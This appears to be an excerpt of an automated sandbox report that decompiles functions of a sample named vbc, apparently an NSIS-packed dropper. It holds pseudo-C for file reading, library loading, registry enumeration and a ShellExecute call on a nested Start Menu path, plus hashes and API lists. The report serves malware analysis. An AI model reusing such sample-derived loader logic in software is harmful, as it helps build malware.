                                                0x00406ef4
                                                0x00406ef7
                                                0x00406efa
                                                0x00406efd
                                                0x00406f00
                                                0x00406f04
                                                0x00406f06
                                                0x00406f09
                                                0x00000000
                                                0x00406f0b
                                                0x00406c88
                                                0x00406c88
                                                0x00000000
                                                0x00406c88
                                                0x00406f09
                                                0x0040713e
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00407175
                                                0x00407175
                                                0x00000000
                                                0x00407175
                                                0x00406fc2
                                                0x00406f49
                                                0x00406f46

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                • Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
                                                • Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                • Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00403283(intOrPtr _a4) {
                                                				intOrPtr _t10;
                                                				intOrPtr _t11;
                                                				signed int _t12;
                                                				void* _t14;
                                                				void* _t15;
                                                				long _t16;
                                                				void* _t18;
                                                				intOrPtr _t19;
                                                				intOrPtr _t31;
                                                				long _t32;
                                                				intOrPtr _t34;
                                                				intOrPtr _t36;
                                                				void* _t37;
                                                				intOrPtr _t49;
                                                
                                                				_t32 =  *0x418ed4; // 0x955a
                                                				_t34 = _t32 -  *0x40ce40 + _a4;
                                                				 *0x42a24c = GetTickCount() + 0x1f4;
                                                				if(_t34 <= 0) {
                                                					L22:
                                                					E00402E33(1);
                                                					return 0;
                                                				}
                                                				E00403402( *0x418ee4);
                                                				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
                                                				 *0x418ee0 = _t34;
                                                				 *0x418ed0 = 0;
                                                				while(1) {
                                                					_t10 =  *0x418ed8; // 0x73508
                                                					_t31 = 0x4000;
                                                					_t11 = _t10 -  *0x418ee4;
                                                					if(_t11 <= 0x4000) {
                                                						_t31 = _t11;
                                                					}
                                                					_t12 = E004033EC(0x414ed0, _t31);
                                                					if(_t12 == 0) {
                                                						break;
                                                					}
                                                					 *0x418ee4 =  *0x418ee4 + _t31;
                                                					 *0x40ce60 = 0x414ed0;
                                                					 *0x40ce64 = _t31;
                                                					L6:
                                                					L6:
                                                					if( *0x42a250 != 0 &&  *0x42a2e0 == 0) {
                                                						_t19 =  *0x418ee0; // 0x1a4bd
                                                						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
                                                						E00402E33(0);
                                                					}
                                                					 *0x40ce68 = 0x40ced0;
                                                					 *0x40ce6c = 0x8000; // executed
                                                					_t14 = E0040672B(0x40ce48); // executed
                                                					if(_t14 < 0) {
                                                						goto L20;
                                                					}
                                                					_t36 =  *0x40ce68; // 0x40f919
                                                					_t37 = _t36 - 0x40ced0;
                                                					if(_t37 == 0) {
                                                						__eflags =  *0x40ce64; // 0x0
                                                						if(__eflags != 0) {
                                                							goto L20;
                                                						}
                                                						__eflags = _t31;
                                                						if(_t31 == 0) {
                                                							goto L20;
                                                						}
                                                						L16:
                                                						_t16 =  *0x418ed4; // 0x955a
                                                						if(_t16 -  *0x40ce40 + _a4 > 0) {
                                                							continue;
                                                						}
                                                						SetFilePointer( *0x40a01c, _t16, 0, 0);
                                                						goto L22;
                                                					}
                                                					_t18 = E00405E99( *0x40a01c, 0x40ced0, _t37); // executed
                                                					if(_t18 == 0) {
                                                						_push(0xfffffffe);
                                                						L21:
                                                						_pop(_t15);
                                                						return _t15;
                                                					}
                                                					 *0x40ce40 =  *0x40ce40 + _t37;
                                                					_t49 =  *0x40ce64; // 0x0
                                                					if(_t49 != 0) {
                                                						goto L6;
                                                					}
                                                					goto L16;
                                                					L20:
                                                					_push(0xfffffffd);
                                                					goto L21;
                                                				}
                                                				return _t12 | 0xffffffff;
                                                			}

















                                                0x00403286
                                                0x00403293
                                                0x004032a6
                                                0x004032ab
                                                0x004033db
                                                0x004033dd
                                                0x00000000
                                                0x004033e3
                                                0x004032b7
                                                0x004032ca
                                                0x004032d0
                                                0x004032d6
                                                0x004032e1
                                                0x004032e1
                                                0x004032e6
                                                0x004032eb
                                                0x004032f3
                                                0x004032f5
                                                0x004032f5
                                                0x004032fe
                                                0x00403305
                                                0x00000000
                                                0x00000000
                                                0x0040330b
                                                0x00403311
                                                0x00403317
                                                0x00000000
                                                0x0040331d
                                                0x00403323
                                                0x0040332d
                                                0x00403343
                                                0x00403348
                                                0x0040334d
                                                0x00403353
                                                0x00403359
                                                0x00403363
                                                0x0040336a
                                                0x00000000
                                                0x00000000
                                                0x0040336c
                                                0x00403372
                                                0x00403374
                                                0x00403397
                                                0x0040339d
                                                0x00000000
                                                0x00000000
                                                0x0040339f
                                                0x004033a1
                                                0x00000000
                                                0x00000000
                                                0x004033a3
                                                0x004033a3
                                                0x004033b6
                                                0x00000000
                                                0x00000000
                                                0x004033c5
                                                0x00000000
                                                0x004033c5
                                                0x0040337e
                                                0x00403385
                                                0x004033d2
                                                0x004033d8
                                                0x004033d8
                                                0x00000000
                                                0x004033d8
                                                0x00403387
                                                0x0040338d
                                                0x00403393
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004033d6
                                                0x004033d6
                                                0x00000000
                                                0x004033d6
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 00403297
                                                  • Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
                                                • SetFilePointer.KERNEL32(0000955A,00000000,00000000,00414ED0,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FilePointer$CountTick
                                                • String ID:
                                                • API String ID: 1092082344-0
                                                • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                • Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
                                                • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                • Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00402032(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t23;
                                                				struct HINSTANCE__* _t31;
                                                				void* _t32;
                                                				void* _t34;
                                                				WCHAR* _t37;
                                                				intOrPtr* _t38;
                                                				void* _t39;
                                                
                                                				_t32 = __ebx;
                                                				asm("sbb eax, 0x42a2f8");
                                                				 *(_t39 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x42a2c8 =  *0x42a2c8 +  *(_t39 - 4);
                                                					return 0;
                                                				}
                                                				_t37 = E00402C53(0xfffffff0);
                                                				 *((intOrPtr*)(_t39 - 0x38)) = E00402C53(1);
                                                				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
                                                					L3:
                                                					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                                					 *(_t39 + 8) = _t23;
                                                					if(_t23 == _t32) {
                                                						_push(0xfffffff6);
                                                						goto L15;
                                                					}
                                                					L4:
                                                					_t38 = E0040665B( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x38)));
                                                					if(_t38 == _t32) {
                                                						E00405371(0xfffffff7,  *((intOrPtr*)(_t39 - 0x38)));
                                                					} else {
                                                						 *(_t39 - 4) = _t32;
                                                						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
                                                							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cddc, 0x40a000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t39 - 0x20)));
                                                							if( *_t38() != 0) {
                                                								 *(_t39 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E004039FB( *(_t39 + 8)) != 0) {
                                                						FreeLibrary( *(_t39 + 8));
                                                					}
                                                					goto L16;
                                                				}
                                                				_t31 = GetModuleHandleW(_t37); // executed
                                                				 *(_t39 + 8) = _t31;
                                                				if(_t31 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}










                                                0x00402032
                                                0x00402032
                                                0x00402037
                                                0x0040203e
                                                0x004020fd
                                                0x0040224b
                                                0x0040224b
                                                0x00402adb
                                                0x00402ade
                                                0x00402aea
                                                0x00402aea
                                                0x0040204d
                                                0x00402057
                                                0x0040205a
                                                0x0040206a
                                                0x0040206e
                                                0x00402076
                                                0x00402079
                                                0x004020f6
                                                0x00000000
                                                0x004020f6
                                                0x0040207b
                                                0x00402086
                                                0x0040208a
                                                0x004020ca
                                                0x0040208c
                                                0x0040208f
                                                0x00402092
                                                0x004020be
                                                0x00402094
                                                0x00402097
                                                0x004020a0
                                                0x004020a2
                                                0x004020a2
                                                0x004020a0
                                                0x00402092
                                                0x004020d2
                                                0x004020eb
                                                0x004020eb
                                                0x00000000
                                                0x004020d2
                                                0x0040205d
                                                0x00402065
                                                0x00402068
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32 ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32 ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: c3fb0e46b14a59558bcb67cbe3242b1d9f84f2f7d5cdac2e4543657a8532a443
                                                • Instruction ID: e4abfbb00710fbb49cfbee30f6c47c6475fc16ace361a0eeed54ffc6686eb32c
                                                • Opcode Fuzzy Hash: c3fb0e46b14a59558bcb67cbe3242b1d9f84f2f7d5cdac2e4543657a8532a443
                                                • Instruction Fuzzy Hash: EB21AD71900215EBCF206FA5CE4999E7971BF04358F60453BF511B51E0CBBD8982DA6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401B71(void* __ebx) {
                                                				intOrPtr _t8;
                                                				void* _t9;
                                                				void _t12;
                                                				void* _t14;
                                                				void* _t22;
                                                				void* _t25;
                                                				void* _t30;
                                                				void* _t33;
                                                				void* _t34;
                                                				char* _t36;
                                                				void* _t37;
                                                
                                                				_t28 = __ebx;
                                                				_t8 =  *((intOrPtr*)(_t37 - 0x20));
                                                				_t30 =  *0x40cddc; // 0x0
                                                				if(_t8 == __ebx) {
                                                					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
                                                						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                						_t34 = _t9;
                                                						_t5 = _t34 + 4; // 0x4
                                                						E00406234(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
                                                						_t12 =  *0x40cddc; // 0x0
                                                						 *_t34 = _t12;
                                                						 *0x40cddc = _t34;
                                                					} else {
                                                						if(_t30 == __ebx) {
                                                							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                						} else {
                                                							_t3 = _t30 + 4; // 0x4
                                                							E00406212(_t33, _t3);
                                                							_push(_t30);
                                                							 *0x40cddc =  *_t30;
                                                							GlobalFree();
                                                						}
                                                					}
                                                					goto L15;
                                                				} else {
                                                					while(1) {
                                                						_t8 = _t8 - 1;
                                                						if(_t30 == _t28) {
                                                							break;
                                                						}
                                                						_t30 =  *_t30;
                                                						if(_t8 != _t28) {
                                                							continue;
                                                						} else {
                                                							if(_t30 == _t28) {
                                                								break;
                                                							} else {
                                                								_t32 = _t30 + 4;
                                                								_t36 = L"Call";
                                                								E00406212(_t36, _t30 + 4);
                                                								_t22 =  *0x40cddc; // 0x0
                                                								E00406212(_t32, _t22 + 4);
                                                								_t25 =  *0x40cddc; // 0x0
                                                								_push(_t36);
                                                								_push(_t25 + 4);
                                                								E00406212();
                                                								L15:
                                                								 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t37 - 4));
                                                								_t14 = 0;
                                                							}
                                                						}
                                                						goto L17;
                                                					}
                                                					_push(0x200010);
                                                					_push(E00406234(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                					E00405957();
                                                					_t14 = 0x7fffffff;
                                                				}
                                                				L17:
                                                				return _t14;
                                                			}














                                                0x00401b71
                                                0x00401b71
                                                0x00401b74
                                                0x00401b7c
                                                0x00401bc5
                                                0x00401bf3
                                                0x00401bfc
                                                0x00401bfe
                                                0x00401c02
                                                0x00401c07
                                                0x00401c0c
                                                0x00401c0e
                                                0x00401bc7
                                                0x00401bc9
                                                0x004028a1
                                                0x00401bcf
                                                0x00401bcf
                                                0x00401bd4
                                                0x00401bdb
                                                0x00401bdc
                                                0x00401be1
                                                0x00401be1
                                                0x00401bc9
                                                0x00000000
                                                0x00401b7e
                                                0x00401b7e
                                                0x00401b7e
                                                0x00401b81
                                                0x00000000
                                                0x00000000
                                                0x00401b87
                                                0x00401b8b
                                                0x00000000
                                                0x00401b8d
                                                0x00401b8f
                                                0x00000000
                                                0x00401b95
                                                0x00401b95
                                                0x00401b98
                                                0x00401b9f
                                                0x00401ba4
                                                0x00401bae
                                                0x00401bb3
                                                0x00401bb8
                                                0x00401bbc
                                                0x004029f7
                                                0x00402adb
                                                0x00402ade
                                                0x00402ae4
                                                0x00402ae4
                                                0x00401b8f
                                                0x00000000
                                                0x00401b8b
                                                0x004022e4
                                                0x004022f1
                                                0x004022f2
                                                0x004022f7
                                                0x004022f7
                                                0x00402ae6
                                                0x00402aea

                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID: Call
                                                • API String ID: 3394109436-1824292864
                                                • Opcode ID: a129a9bae1f3e3aa0587fed65d507cc7f280475a2da7505159faf37190c725ea
                                                • Instruction ID: bfeac54a7e569f0ef8803044b169413d496b9424a5b862e02772d0402316afe5
                                                • Opcode Fuzzy Hash: a129a9bae1f3e3aa0587fed65d507cc7f280475a2da7505159faf37190c725ea
                                                • Instruction Fuzzy Hash: 5521AE72A44140EBCB20EBD48E8495E77B9EF94318B21457BF502B72D0DBB89851DF2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00402511(int* __ebx, intOrPtr __edx, short* __esi) {
                                                				int _t9;
                                                				long _t12;
                                                				int* _t15;
                                                				intOrPtr _t20;
                                                				void* _t21;
                                                				short* _t23;
                                                				void* _t25;
                                                				void* _t28;
                                                
                                                				_t23 = __esi;
                                                				_t20 = __edx;
                                                				_t15 = __ebx;
                                                				_t21 = E00402D5D(_t28, 0x20019);
                                                				_t9 = E00402C31(3);
                                                				 *((intOrPtr*)(_t25 - 0x50)) = _t20;
                                                				 *__esi = __ebx;
                                                				if(_t21 == __ebx) {
                                                					L7:
                                                					 *((intOrPtr*)(_t25 - 4)) = 1;
                                                				} else {
                                                					 *(_t25 + 8) = 0x3ff;
                                                					if( *((intOrPtr*)(_t25 - 0x18)) == __ebx) {
                                                						_t12 = RegEnumValueW(_t21, _t9, __esi, _t25 + 8, __ebx, __ebx, __ebx, __ebx);
                                                						__eflags = _t12;
                                                						if(_t12 != 0) {
                                                							goto L7;
                                                						} else {
                                                							goto L4;
                                                						}
                                                					} else {
                                                						RegEnumKeyW(_t21, _t9, __esi, 0x3ff); // executed
                                                						L4:
                                                						_t23[0x3ff] = _t15;
                                                						_push(_t21); // executed
                                                						RegCloseKey(); // executed
                                                					}
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t25 - 4));
                                                				return 0;
                                                			}











                                                0x00402511
                                                0x00402511
                                                0x00402511
                                                0x0040251d
                                                0x0040251f
                                                0x00402527
                                                0x0040252a
                                                0x0040252d
                                                0x004028a1
                                                0x004028a1
                                                0x00402533
                                                0x0040253b
                                                0x0040253e
                                                0x00402557
                                                0x0040255d
                                                0x0040255f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402540
                                                0x00402544
                                                0x00402565
                                                0x00402565
                                                0x0040256c
                                                0x0040256d
                                                0x0040256d
                                                0x0040253e
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                  • Part of subcall function 00402D5D: RegOpenKeyExW.KERNEL32 ref: 00402D85
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
                                                • RegCloseKey.KERNEL32(?), ref: 0040256D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Enum$CloseOpenValue
                                                • String ID:
                                                • API String ID: 167947723-0
                                                • Opcode ID: 0c95f07365d0810d1379e4cf05c2d8f775e19b9fc74d36f1e15b5dbdcc2d3ea2
                                                • Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
                                                • Opcode Fuzzy Hash: 0c95f07365d0810d1379e4cf05c2d8f775e19b9fc74d36f1e15b5dbdcc2d3ea2
                                                • Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E00401E77() {
                                                				short* _t6;
                                                				void* _t16;
                                                				void* _t19;
                                                				void* _t26;
                                                
                                                				_t24 = E00402C53(_t19);
                                                				_t6 = E00402C53(0x31);
                                                				_t22 = E00402C53(0x22);
                                                				E00402C53(0x15);
                                                				E00401423(0xffffffec);
                                                				asm("sbb eax, eax");
                                                				asm("sbb eax, eax");
                                                				_t16 = ShellExecuteW( *(_t26 - 8),  ~( *_t5) & _t24, _t6,  ~( *_t7) & _t22, L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac",  *(_t26 - 0x1c)); // executed
                                                				if(_t16 < 0x21) {
                                                					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t26 - 4));
                                                				return 0;
                                                			}







                                                0x00401e7f
                                                0x00401e81
                                                0x00401e91
                                                0x00401e93
                                                0x00401e9a
                                                0x00401ea8
                                                0x00401eb8
                                                0x00401ec1
                                                0x00401eca
                                                0x004028a1
                                                0x004028a1
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac,?), ref: 00401EC1
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 00401EAA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac
                                                • API String ID: 587946157-910239263
                                                • Opcode ID: e7bff97d71f21c96df116bedaaf52e3af406fef7691ae85ae08fd2fc7f8bfbb5
                                                • Instruction ID: 3dcdd3b781ba8ea7f848cddc5e889496084bd88ab3ad0d62e4dc7728c2b1bbdb
                                                • Opcode Fuzzy Hash: e7bff97d71f21c96df116bedaaf52e3af406fef7691ae85ae08fd2fc7f8bfbb5
                                                • Instruction Fuzzy Hash: 35F0C835704511A7DB107BB5DE4AA9D3264DB40758F208576F901F71D1DAFCC9829628
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(00000000), ref: 10002963
                                                • GetLastError.KERNEL32 ref: 10002A6A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID:
                                                • API String ID: 1214770103-0
                                                • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
